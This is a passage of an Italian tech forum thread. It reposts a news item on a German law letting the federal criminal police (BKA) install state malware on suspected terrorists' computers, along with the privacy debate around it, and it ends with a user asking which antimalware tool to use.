La disputa si preannuncia accesa, nonostante il ministro Schauble abbia tentato di rassicurare gli oppositori riguardo alla parsimonia con la quale la legge verrà applicata. Una promessa, riporta Spiegel Online, supportata dalla parole del presidente della Bundeskriminalamt (BKA), la polizia criminale tedesca, che assicura che la normativa verrà applicata con una frequenza nell'ordine di dieci volte l'anno con interventi mirati e personalizzati, che non porranno problemi di privacy, in quanto le investigazioni si limiteranno a carpire pochi bit di informazioni, senza sconfinare nella vita privata del presunto terrorista.

Queste precisazioni potrebbero però non temperare la strenua opposizione di coloro che temono che il provvedimento possa aprire la strada ad uno spionaggio statale pervasivo, in grado di attentare al diritto alla privacy dei netizen tedeschi, con la conseguenza di minare la fiducia che i cittadini ripongono nello stato. Dei rischi che, tra l'altro, il governo potrebbe correre inutilmente, dato che, osservano l'esperto di sicurezza Hartmut Pohl intervistato da AP e numerosi utenti di Slashdot, sarebbe un'ingenuità ritenere che i sospetti terroristi che operano online siano sprovveduti al punto di non saper riconoscere il malware statale.

Fonte: Punto Informatico
c.m.g è offline   Rispondi citando il messaggio o parte di esso
Old 29-10-2008, 21:34   #100
kainard
Member
 
Iscritto dal: Aug 2006
Messaggi: 67
qual'è secondo voi il miglior malware remover o antimalware in questo momento?

più passa il tempo e più mi sembra che gli antivirus un tempo validi non fan praticamente nulla, a meno che non si utilizzi le loro versioni internet security a pagamento. cosa consigliate?
kainard è offline   Rispondi citando il messaggio o parte di esso
 Rispondi


ASUS ROG Swift OLED PG49WCD: quando QD-OLED e ultrawide si fondono ASUS ROG Swift OLED PG49WCD: quando QD-OLED e ul...
Dreame L10s Pro Ultra Heat: la pulizia di casa tutta sostanza Dreame L10s Pro Ultra Heat: la pulizia di casa t...
HONOR Magic6 Pro: come funziona Magic Portal, il modo ''intelligente'' di condividere HONOR Magic6 Pro: come funziona Magic Portal, il...
L'innovazione richiede fiducia: Workday si propone come guida nell'era dell'IA L'innovazione richiede fiducia: Workday si propo...
Recensione HONOR Pad 9: ampio display e audio top per il tablet per l'intrattenimento Recensione HONOR Pad 9: ampio display e audio to...
Take-Two acquisisce Gearbox per 460 mili...
NVIDIA H100, H200 e Intel Gaudi 2 si sfi...
Lamborghini, nuovo logo e font, ora abbr...
Xbox Series X si veste di bianco, ma &eg...
La Porsche Boxster elettrica beccata in ...
L'iPad da 10,9" (Wi-Fi, 64GB) è sceso a ...
Dell, calo del mercato PC: licenziati 13...
Alfa Romeo Milano, scopriamo profilo e l...
Hisense vende un TV FHD 32 pollici con Q...
Cisco Webex anche in auto: ora è ...
Phil Schiller, il boss dell'App Store di...
Lola in Formula E insieme a Yamaha, due ...
Motorola MA1 è l'accessorio ideale per u...
Tineco e aspirapolveri senza fili, la nu...
Blocco note, c'è un modo per ripr...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi

Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 13:54.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Served by www2v